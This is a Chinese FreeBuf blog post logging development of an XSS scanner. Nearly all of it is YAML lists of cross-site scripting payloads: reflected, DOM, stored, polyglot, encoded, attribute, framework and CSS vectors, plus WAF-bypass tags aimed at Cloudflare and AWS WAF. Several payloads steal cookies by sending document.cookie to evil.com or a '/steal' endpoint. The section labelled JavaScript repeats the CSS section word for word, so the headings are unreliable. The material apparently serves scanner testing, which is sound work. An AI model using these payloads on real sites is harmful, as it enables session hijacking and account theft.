官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
HrBeyondXSS开发记录(1)——payload
- 关注
HrBeyondXSS开发记录(1)——payload
本文由
创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
基础payload
此payload包含常见的基础向量,例如DOM型的常见Sink函数,事件处理器和对象污染等,以及存储型XSS的Cookie注入和存储对象注入
reflected:
basic:
- "<script>alert(document.domain)</script>"
- "<img src=x onerror=alert(1)>"
- "<svg onload=confirm(1)>"
- "<body onpageshow=prompt(2)>"
- "<iframe srcdoc='<script>parent.alert(1)</script>'>"
tag_breaking:
- "'-alert(1)-'"
- "';alert(1)//"
- "</script><script>alert(1)</script>"
- "><script>alert(1)</script>"
- "{{constructor.constructor('alert(1)')()}}"
js_protocols:
- "javascript:alert(1)"
- "data:text/html,<script>alert(1)</script>"
- "vbscript:MsgBox(1)"
- "livescript:alert`1`"
dom_based:
sink_functions:
- "eval('{{input}}')"
- "document.write('<div>{{input}}</div>')"
- "element.innerHTML = '{{input}}'"
- "location.href = '{{input}}'"
- "Function('{{input}}')()"
event_handlers:
- "onload=alert(1)"
- "onmouseover=prompt(2)"
- "onfocus=console.log(3)"
- "onanimationstart=confirm(4)"
- "onpointerenter=print(5)"
source_contamination:
- "document.cookie"
- "window.name"
- "location.hash.substr(1)"
- "document.referrer"
- "window.postMessage"
stored:
persistence_vectors:
- "<svg style=display:none onload=setInterval(function(){alert(1)},9999)>"
- "<meta http-equiv='refresh' content='0; url=javascript:alert(1)'>"
- "<audio src=x onerror=alert(1)>"
- "<video poster=javascript:alert(1)>"
- "<link rel=stylesheet href='data:text/css,*{color:red};x:expression(alert(1))'>"
cookie_injection:
- "document.cookie='XSS=; expires=Thu, 01 Jan 2970 00:00:00 UTC; path=/;'"
- "document.cookie='session=malicious<script>alert(1)</script>'"
storage_objects:
- "localStorage.setItem('xss','<script>alert(1)</script>')"
- "sessionStorage.xss = 'javascript:alert(1)'"
- "IndexedDB.open('xss', {pwn: alert(1)})"
polyglot:
universal:
- "jaVasCript:/*-/*`/*\`/*'/*\"/**/(alert(1))//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1)//>\\x3e"
hybrid:
- "';alert(1)//\";alert(1)<!--"
- "<image/src/onerror=alert(1)>"
- "<input/autofocus/onfocus=alert(1)//%0A>"
- "<details open ontoggle=alert(1)>"
- "<select autofocus onfocus=alert(1)>"
math_obfuscation:
- "<script>window[`al${(1).toString(30)}ert`](1)</script>"
- "eval(String.fromCharCode(97,108,101,114,116,40,49,41))"
encodings:
html_entities:
- "<script>"
- "<script>alert(1)</script>"
unicode:
- "\u003Cscript\u003Ealert(1)\u003C/script\u003E"
- "\u0061\u006C\u0065\u0072\u0074(1)"
base64:
- "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
- "JHtCYXNlNjQuZGVjb2RlKCdhbGVydCgxKScpfQ=="
urlencode:
- "%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
- "javascript%3Aalert%28document.cookie%29"
obfuscation:
whitespace:
- "<script\u200c>alert(1)</script>"
- "<img\tsrc=x\ronerror=alert(1)>"
comment_injection:
- "/*<!--*/alert(1)/*-->*/"
- "<script><!--\nalert(1)\n//--></script>"
uncommon_tags:
- "<noscript><style><a id=</style><img src=x onerror=alert(1)></noscript>"
- "<template shadowroot=open><script>alert(1)</script></template>"
nested_encoding:
- "%25%33%43%73%63%72%69%70%74%25%33%45%61%6C%65%72%74%28%31%29%25%33%43%2F%73%63%72%69%70%74%25%33%45"
- "JAVASCRIPT:%0A%0Dalert%281%29"
html属性payload
basic_attributes:
src:
- "javascript:alert(1)"
- "javascript:eval(atob('YWxlcnQoMSk='))"
- "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
- "javascript:alert(1)"
href:
- "javascript:void(document.location='http://evil.com/?c='+document.cookie)"
- "vbscript:MsgBox(1)"
- "javascript:alert(1)"
action:
- "javascript:alert(1)"
- "data:text/html,<script>alert(1)</script>"
data:
- "data:text/html,<script>alert(1)</script>"
- "javascript:alert(1);"
event_handlers:
generic:
- "alert(1)"
- "confirm(document.cookie)"
- "prompt('XSS')"
advanced:
- "eval('al' + 'ert(1)')"
- "setTimeout('alert(1)',0)"
- "Function('ale'+'rt(1)')()"
encoded:
- "alert(1)
- "\u0061\u006c\u0065\u0072\u0074(1)"
framework_specific:
- "angular.element(document).injector().get('$rootScope').$eval('alert(1)')" # AngularJS
- "window.__vue__.alert(1)" # Vue 2
special_attributes:
style:
- "background-image: url(javascript:alert(1))"
- "expression(alert(1))"
- "animation: x; @keyframes x { from { background: url(javascript:alert(1)) } }"
formaction:
- "javascript:alert(1)"
- "data:text/html,<script>alert(1)</script>"
poster:
- "javascript:alert(1)"
- "data:text/html,<script>alert(1)</script>"
modern_attributes:
srcdoc:
- "<script>alert(1)</script>"
- "<iframe src=javascript:alert(1)>"
integrity:
- "'sha256-...' alert(1)"
onauxclick:
- "alert(1)"
- "fetch('/steal?cookie='+document.cookie)"
framework_specific:
vue:
v-bind:href:
- "javascript:alert(1)"
- "data:text/html,{{constructor.constructor('alert(1)')()}}"
v-on:click:
- "alert(1)"
- "_c.escape(_s(${payload}))"
react:
dangerouslySetInnerHTML:
- "{__html: '<img src=x onerror=alert(1)>'}"
onClick:
- "alert(1)"
- "eval('alert(1)')"
angular:
[innerHTML]:
- "<img src=x onerror=alert(1)>"
- "{{constructor.constructor('alert(1)')()}}"
(click):
- "alert(1)"
- "this.constructor.constructor('alert(1)')()"
obfuscation_techniques:
case_insensitive:
- "oNerRor=alert(1)"
- "OnLoAd=confirm(1)"
whitespace_variants:
- "onload = alert(1)"
- "onload/*comment*/=/*...*/alert(1)"
null_bytes:
- "onload=alert(1)%00"
- "java%00script:alert(1)"
unicode_smuggling:
- "onload=\u0061lert(1)"
- "javascript:\u0061lert(1)"
advanced_bypass:
template_literals:
- "onload=${`alert(1)`}"
- "href=javascript:${`alert`}${1}"
prototype_pollution:
- "onload=Object.prototype.exec=alert;1/toString()"
import_functions:
- "onload=import('data:text/javascript,alert(1)')"
- "onload=import(`/evil.com?q=${document.cookie}`)"
polymorphic:
combo_1: "jAvAsCrIpT:alert(1)/*{{7*7}}*/"
combo_2: "data:text/html;charset=,<script>alert(1)</script>"
combo_3: "jav	ascript:alert(1)"
JavaScript
此payload包含常见JavaScript向量,如webAPI,框架特性,浏览器特性。例如存储操作,虚拟DOM,第三方库,WASM交互,Web Components等
basic_injection:
ie_expression:
- "background: expression(alert(1))"
- "width: /**/expression(alert(document.domain))"
javascript_url:
- "background-image: url(javascript:alert(1))"
- "list-style-image: url('javascript:alert(\"XSS\")')"
data_uri:
- "background: url(data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==)"
- "cursor: url(data:text/html;charset=utf-8,<script>alert(1)</script>)"
modern_features:
css_variables:
- "--malicious: ; background-image: url(javascript:alert(1))"
- "var(--xss, url(javascript:alert(document.cookie)))"
keyframes:
- |
@keyframes xss {
from { background: url('x'); }
to { background: expr/* */ession(alert(1)) }
}
- |
@-webkit-keyframes pwn {
0% { background: normal; }
100% { background: javascript:alert(1); }
}
houdini:
- |
CSS.paintWorklet.addModule('data:text/javascript,alert(1)')
- "background: paint(xss-worklet)"
encoding_bypass:
hex_escape:
- "background:\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74\\3Aalert(1)"
- "content: \"\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74\\3Aalert(1)\""
unicode_escape:
- "background:\\6A\\61vascript:alert(1)"
- "font-family:'\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74';content:alert(1);"
comment_obfuscation:
- "background: url(/* */javascript:alert(1))"
- "color: rgba(255/* */,255/* */,255/* */,expression(alert(1)))"
pseudo_attack:
hover_trigger:
- "a:hover { background: url(javascript:alert('onhover')) }"
- "div:hover::after { content: url(javascript:alert(1)) }"
focus_stealing:
- "input:focus { background-image: url('data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==') }"
font_attack:
font_face:
- |
@font-face {
font-family: xss;
src: url("javascript:alert(1)");
}
- "font-family: xss;"
local_font:
- "font-family: '\\')</style><script>alert(1)</script>';"
media_query:
conditional:
- "@media (width: 999999px) { body { background: url(javascript:alert('Media Query XSS')) } }"
script_media:
- "@media javascript:alert(1) { }"
advanced_obfuscation:
layered_encoding:
- "background: \\75\\72\\6C\\28\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74\\3A\\61\\6C\\65\\72\\74\\28\\31\\29\\29"
property_split:
- "back\\ground: url(javascript:alert(1))"
- "font-\\66 amily: '\\';} body {background: expression(alert(1))};'"
illegal_chars:
- "background:\uFFFDurl(javascript:alert(1))"
- "color: rgba(1,1,1,alert(1))"
browser_specific:
ie_conditional:
- "<!--[if IE]> <style> body { background: expression(alert(1)) } </style> <![endif]-->"
webkit_exploit:
- "-webkit-animation: xss 1s; -webkit-keyframes xss { from { background: normal; } to { background: url(javascript:alert(1)) } }"
evasion_tags:
- waf_bypass_level: 3
target: cloudflare
techniques:
- comment_insertion
- unicode_normalization
- waf_bypass_level: 5
target: aws_waf
techniques:
- layered_encoding
- property_split
CSS样式表
此payload包含常见css向量,如css的特性,伪元素,字体定义,媒体查询等,例如css变量滥用,动画关键帧注入和Houdini API利用等
basic_injection:
ie_expression:
- "background: expression(alert(1))"
- "width: /**/expression(alert(document.domain))"
javascript_url:
- "background-image: url(javascript:alert(1))"
- "list-style-image: url('javascript:alert(\"XSS\")')"
data_uri:
- "background: url(data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==)"
- "cursor: url(data:text/html;charset=utf-8,<script>alert(1)</script>)"
modern_features:
css_variables:
- "--malicious: ; background-image: url(javascript:alert(1))"
- "var(--xss, url(javascript:alert(document.cookie)))"
keyframes:
- |
@keyframes xss {
from { background: url('x'); }
to { background: expr/* */ession(alert(1)) }
}
- |
@-webkit-keyframes pwn {
0% { background: normal; }
100% { background: javascript:alert(1); }
}
houdini:
- |
CSS.paintWorklet.addModule('data:text/javascript,alert(1)')
- "background: paint(xss-worklet)"
encoding_bypass:
hex_escape:
- "background:\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74\\3Aalert(1)"
- "content: \"\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74\\3Aalert(1)\""
unicode_escape:
- "background:\\6A\\61vascript:alert(1)"
- "font-family:'\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74';content:alert(1);"
comment_obfuscation:
- "background: url(/* */javascript:alert(1))"
- "color: rgba(255/* */,255/* */,255/* */,expression(alert(1)))"
pseudo_attack:
hover_trigger:
- "a:hover { background: url(javascript:alert('onhover')) }"
- "div:hover::after { content: url(javascript:alert(1)) }"
focus_stealing:
- "input:focus { background-image: url('data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==') }"
font_attack:
font_face:
- |
@font-face {
font-family: xss;
src: url("javascript:alert(1)");
}
- "font-family: xss;"
local_font:
- "font-family: '\\')</style><script>alert(1)</script>';"
media_query:
conditional:
- "@media (width: 999999px) { body { background: url(javascript:alert('Media Query XSS')) } }"
script_media:
- "@media javascript:alert(1) { }"
advanced_obfuscation:
layered_encoding:
- "background: \\75\\72\\6C\\28\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74\\3A\\61\\6C\\65\\72\\74\\28\\31\\29\\29"
property_split:
- "back\\ground: url(javascript:alert(1))"
- "font-\\66 amily: '\\';} body {background: expression(alert(1))};'"
illegal_chars:
- "background:\uFFFDurl(javascript:alert(1))"
- "color: rgba(1,1,1,alert(1))"
browser_specific:
ie_conditional:
- "<!--[if IE]> <style> body { background: expression(alert(1)) } </style> <![endif]-->"
webkit_exploit:
- "-webkit-animation: xss 1s; -webkit-keyframes xss { from { background: normal; } to { background: url(javascript:alert(1)) } }"
evasion_tags:
- waf_bypass_level: 3
target: cloudflare
techniques:
- comment_insertion
- unicode_normalization
- waf_bypass_level: 5
target: aws_waf
techniques:
- layered_encoding
- property_split
对各种前端框架(例如:React、Vue和Angular等)的针对型payload将不在这里公开,之后开发完成之后可以在Github上查看,此扫描器将在Github上开源,请各位黑客大佬敬请期待
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
已在FreeBuf发表 0 篇文章
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
- 0 文章数
- 0 关注者